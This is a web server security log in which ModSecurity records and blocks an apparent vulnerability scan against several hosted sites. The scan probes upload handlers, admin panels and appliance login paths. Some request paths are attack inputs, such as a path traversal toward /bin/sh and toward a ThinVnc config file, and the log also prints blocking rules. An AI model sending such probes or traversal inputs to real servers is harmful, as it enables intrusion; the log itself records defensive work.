[Tue May 26 15:13:23.149180 2026] [security2:error] [pid 686593:tid 686788] [client 23.94.40.119:34752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrO-ilgkZcvx0_tl-_pwAAAMY"]
[Tue May 26 15:13:23.424416 2026] [security2:error] [pid 686593:tid 686729] [client 23.94.40.119:34764] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/login.php"] [unique_id "ahVrO-ilgkZcvx0_tl-_tAAAAIs"]
[Tue May 26 15:13:23.437962 2026] [security2:error] [pid 686593:tid 686833] [client 23.94.40.119:34766] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/cgi-sys/404.html"] [unique_id "ahVrO-ilgkZcvx0_tl-_tQAAAPM"]
[Tue May 26 15:13:23.754896 2026] [security2:error] [pid 686593:tid 686764] [client 85.121.240.156:51362] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrO-ilgkZcvx0_tl-_wAAAAK4"]
[Tue May 26 15:13:23.811763 2026] [security2:error] [pid 686593:tid 686781] [client 23.94.40.119:34772] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/user/register"] [unique_id "ahVrO-ilgkZcvx0_tl-_vAAAAL8"], referer: webmail.pronumbers.com.au/user/register
[Tue May 26 15:13:23.811959 2026] [security2:error] [pid 686593:tid 686781] [client 23.94.40.119:34772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "160"] [id "900408"] [msg "register POST logging"] [data "406"] [hostname "webmail.pronumbers.com.au"] [uri "/user/register"] [unique_id "ahVrO-ilgkZcvx0_tl-_vAAAAL8"], referer: webmail.pronumbers.com.au/user/register
[Tue May 26 15:13:23.852055 2026] [security2:error] [pid 686593:tid 686848] [client 23.94.40.119:34788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/umotion/modules/reporting/track_import_export.php"] [unique_id "ahVrO-ilgkZcvx0_tl-_zgAAAQI"]
[Tue May 26 15:13:24.029971 2026] [security2:error] [pid 686593:tid 686756] [client 23.94.40.119:34790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/umotion/modules/reporting/track_import_export.php"] [unique_id "ahVrPOilgkZcvx0_tl-_1gAAAKY"]
[Tue May 26 15:13:24.599970 2026] [security2:error] [pid 686593:tid 686777] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrO-ilgkZcvx0_tl-_0QAAALs"]
[Tue May 26 15:13:26.096975 2026] [security2:error] [pid 686593:tid 686738] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrPeilgkZcvx0_tl_AFwAAAJQ"]
[Tue May 26 15:13:26.254557 2026] [security2:error] [pid 686593:tid 686762] [client 23.94.40.119:34814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/jQuery-File-Upload/server/php/index.php"] [unique_id "ahVrPuilgkZcvx0_tl_AMAAAAKw"]
[Tue May 26 15:13:26.255021 2026] [security2:error] [pid 686593:tid 686743] [client 23.94.40.119:34824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_AMgAAAJk"]
[Tue May 26 15:13:26.255925 2026] [security2:error] [pid 686593:tid 686802] [client 23.94.40.119:34816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/jQuery-File-Upload/server/php/index.php/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_AMQAAANQ"]
[Tue May 26 15:13:26.261326 2026] [security2:error] [pid 686593:tid 686805] [client 23.94.40.119:34830] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ahVrPuilgkZcvx0_tl_ANAAAANc"]
[Tue May 26 15:13:26.745966 2026] [security2:error] [pid 686593:tid 686843] [client 23.94.40.119:34850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/jquery-file-upload/server/php/index.php/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_APQAAAP0"]
[Tue May 26 15:13:26.747502 2026] [security2:error] [pid 686593:tid 686817] [client 23.94.40.119:34864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/server/php/upload.class.php"] [unique_id "ahVrPuilgkZcvx0_tl_APgAAAOM"]
[Tue May 26 15:13:26.752634 2026] [security2:error] [pid 686593:tid 686838] [client 23.94.40.119:34856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_APwAAAPg"]
[Tue May 26 15:13:26.753129 2026] [security2:error] [pid 686593:tid 686768] [client 23.94.40.119:34874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/server/php/upload.class.php/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_AQAAAALI"]
[Tue May 26 15:13:26.756213 2026] [security2:error] [pid 686593:tid 686804] [client 23.94.40.119:34840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/jquery-file-upload/server/php/index.php"] [unique_id "ahVrPuilgkZcvx0_tl_AQgAAANY"]
[Tue May 26 15:13:26.756310 2026] [security2:error] [pid 686593:tid 686815] [client 23.94.40.119:34884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_AQwAAAOE"]
[Tue May 26 15:13:26.756717 2026] [security2:error] [pid 686593:tid 686751] [client 23.94.40.119:34886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/server/php/UploadHandler.php"] [unique_id "ahVrPuilgkZcvx0_tl_ARAAAAKE"]
[Tue May 26 15:13:26.756815 2026] [security2:error] [pid 686593:tid 686825] [client 23.94.40.119:34896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/server/php/UploadHandler.php/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_ARQAAAOs"]
[Tue May 26 15:13:26.757311 2026] [security2:error] [pid 686593:tid 686845] [client 23.94.40.119:34900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_ARgAAAP8"]
[Tue May 26 15:13:26.758472 2026] [security2:error] [pid 686593:tid 686794] [client 23.94.40.119:34904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/example/upload.php"] [unique_id "ahVrPuilgkZcvx0_tl_ARwAAAMw"]
[Tue May 26 15:13:26.760650 2026] [security2:error] [pid 686593:tid 686726] [client 23.94.40.119:34920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/example/upload.php/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_ASAAAAIg"]
[Tue May 26 15:13:26.760766 2026] [security2:error] [pid 686593:tid 686819] [client 23.94.40.119:34926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_ASQAAAOU"]
[Tue May 26 15:13:26.760852 2026] [security2:error] [pid 686593:tid 686775] [client 23.94.40.119:34932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php/index.php"] [unique_id "ahVrPuilgkZcvx0_tl_ASgAAALk"]
[Tue May 26 15:13:26.761493 2026] [security2:error] [pid 686593:tid 686748] [client 23.94.40.119:34934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php/index.php/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_ASwAAAJ4"]
[Tue May 26 15:13:26.767065 2026] [security2:error] [pid 686593:tid 686733] [client 23.94.40.119:34944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/files/j83NveQp.php"] [unique_id "ahVrPuilgkZcvx0_tl_ATQAAAI8"]
[Tue May 26 15:13:28.622445 2026] [security2:error] [pid 686593:tid 686832] [client 87.218.148.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrQOilgkZcvx0_tl_AgAAAAPI"]
[Tue May 26 15:13:28.722182 2026] [security2:error] [pid 686593:tid 686839] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrQOilgkZcvx0_tl_AhwAAAPk"]
[Tue May 26 15:13:30.834309 2026] [security2:error] [pid 686593:tid 686769] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrQuilgkZcvx0_tl_AxQAAALM"]
[Tue May 26 15:13:31.018131 2026] [security2:error] [pid 686593:tid 686810] [client 23.94.40.119:38828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-post.php"] [unique_id "ahVrQ-ilgkZcvx0_tl_A0wAAANw"]
[Tue May 26 15:13:31.237347 2026] [security2:error] [pid 686593:tid 686783] [client 23.94.40.119:38838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-login.php"] [unique_id "ahVrQ-ilgkZcvx0_tl_A3QAAAME"]
[Tue May 26 15:13:32.365414 2026] [fcgid:warn] [pid 686593:tid 686736] (70014)End of file found: [client 66.132.172.185:36416] mod_fcgid: can't get data from http client
[Tue May 26 15:13:32.587212 2026] [security2:error] [pid 686593:tid 686762] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrROilgkZcvx0_tl_A8AAAAKw"]
[Tue May 26 15:13:32.765222 2026] [security2:error] [pid 686593:tid 686831] [client 85.121.240.156:59780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrROilgkZcvx0_tl_A_gAAAPE"]
[Tue May 26 15:13:34.269634 2026] [security2:error] [pid 686593:tid 686840] [client 23.94.40.119:38930] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ahVrRuilgkZcvx0_tl_BZQAAAPo"]
[Tue May 26 15:13:35.128107 2026] [security2:error] [pid 686593:tid 686750] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrRuilgkZcvx0_tl_BgQAAAKA"]
[Tue May 26 15:13:35.451617 2026] [security2:error] [pid 686593:tid 686753] [client 23.94.40.119:38950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/Citrix/StoreAuth/ExplicitForms/Start"] [unique_id "ahVrR-ilgkZcvx0_tl_BlwAAAKM"]
[Tue May 26 15:13:35.452122 2026] [security2:error] [pid 686593:tid 686762] [client 23.94.40.119:38942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php/Index/index"] [unique_id "ahVrR-ilgkZcvx0_tl_BlgAAAKw"]
[Tue May 26 15:13:35.745466 2026] [security2:error] [pid 686593:tid 686755] [client 23.94.40.119:38998] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/rpc.cgi"] [unique_id "ahVrR-ilgkZcvx0_tl_BogAAAKU"], referer: https://webmail.pronumbers.com.au/sysinfo.cgi?xnavigation=1
[Tue May 26 15:13:36.575119 2026] [security2:error] [pid 686593:tid 686767] [client 23.94.40.119:39032] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/.%0d./.%0d./.%0d./.%0d./bin/sh"] [unique_id "ahVrSOilgkZcvx0_tl_BxAAAALE"]
[Tue May 26 15:13:37.122120 2026] [security2:error] [pid 686593:tid 686780] [client 23.94.40.119:39056] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/apply_sec.cgi"] [unique_id "ahVrSeilgkZcvx0_tl_B2gAAAL4"], referer: https://webmail.pronumbers.com.au/login_pic.asp
[Tue May 26 15:13:37.224738 2026] [security2:error] [pid 686593:tid 686725] [client 23.94.40.119:39072] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/visualizer/readme.txt"] [unique_id "ahVrSeilgkZcvx0_tl_B2wAAAIc"]
[Tue May 26 15:13:37.314112 2026] [security2:error] [pid 686593:tid 686766] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrSOilgkZcvx0_tl_B0AAAALA"]
[Tue May 26 15:13:37.463001 2026] [security2:error] [pid 686593:tid 686746] [client 23.94.40.119:39096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin.php"] [unique_id "ahVrSeilgkZcvx0_tl_B6AAAAJw"]
[Tue May 26 15:13:37.970496 2026] [security2:error] [pid 686593:tid 686776] [client 23.94.40.119:33304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/zabbix/zabbix.php"] [unique_id "ahVrSeilgkZcvx0_tl_CBAAAALo"]
[Tue May 26 15:13:37.998126 2026] [security2:error] [pid 686593:tid 686846] [client 185.191.171.13:42126] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVrSeilgkZcvx0_tl_CCgAAAQA"]
[Tue May 26 15:13:37.998275 2026] [security2:error] [pid 686593:tid 686846] [client 185.191.171.13:42126] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVrSeilgkZcvx0_tl_CCgAAAQA"]
[Tue May 26 15:13:38.013951 2026] [security2:error] [pid 686593:tid 686781] [client 23.94.40.119:33314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/zabbix.php"] [unique_id "ahVrSuilgkZcvx0_tl_CDAAAAL8"]
[Tue May 26 15:13:39.451357 2026] [security2:error] [pid 686593:tid 686812] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrS-ilgkZcvx0_tl_CKAAAAN4"]
[Tue May 26 15:13:41.202666 2026] [security2:error] [pid 686593:tid 686738] [client 104.23.217.117:10771] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-admin/install.php"] [unique_id "ahVrTeilgkZcvx0_tl_CXwAAAJQ"]
[Tue May 26 15:13:41.483656 2026] [security2:error] [pid 686593:tid 686841] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrTeilgkZcvx0_tl_CXgAAAPs"]
[Tue May 26 15:13:42.815142 2026] [security2:error] [pid 686593:tid 686777] [client 23.94.40.119:33340] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/artifactory/ui/auth/login"] [unique_id "ahVrTuilgkZcvx0_tl_CjwAAALs"]
[Tue May 26 15:13:43.219543 2026] [security2:error] [pid 686593:tid 686801] [client 23.94.40.119:33348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/getcfg.php"] [unique_id "ahVrT-ilgkZcvx0_tl_CmgAAANM"]
[Tue May 26 15:13:43.933578 2026] [security2:error] [pid 686593:tid 686820] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrT-ilgkZcvx0_tl_CpgAAAOY"]
[Tue May 26 15:13:44.065929 2026] [security2:error] [pid 686593:tid 686849] [client 89.221.204.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrT-ilgkZcvx0_tl_CuQAAAQM"], referer: https://www.anujtradingco.com/
[Tue May 26 15:13:45.147459 2026] [security2:error] [pid 686593:tid 686838] [client 85.121.240.156:47690] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrUOilgkZcvx0_tl_C1AAAAPg"]
[Tue May 26 15:13:45.205222 2026] [security2:error] [pid 686593:tid 686827] [client 89.221.204.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrUeilgkZcvx0_tl_C2wAAAO0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 15:13:45.470250 2026] [core:error] [pid 686593:tid 686784] [client 23.94.40.119:33402] AH10244: invalid URI path (/3EFyJZdYH9kwMtzMV8cWNUVrIqX/../../ThinVnc.ini)
[Tue May 26 15:13:45.755677 2026] [security2:error] [pid 686593:tid 686819] [client 23.94.40.119:33426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/up.cgi"] [unique_id "ahVrUeilgkZcvx0_tl_DAgAAAOU"]
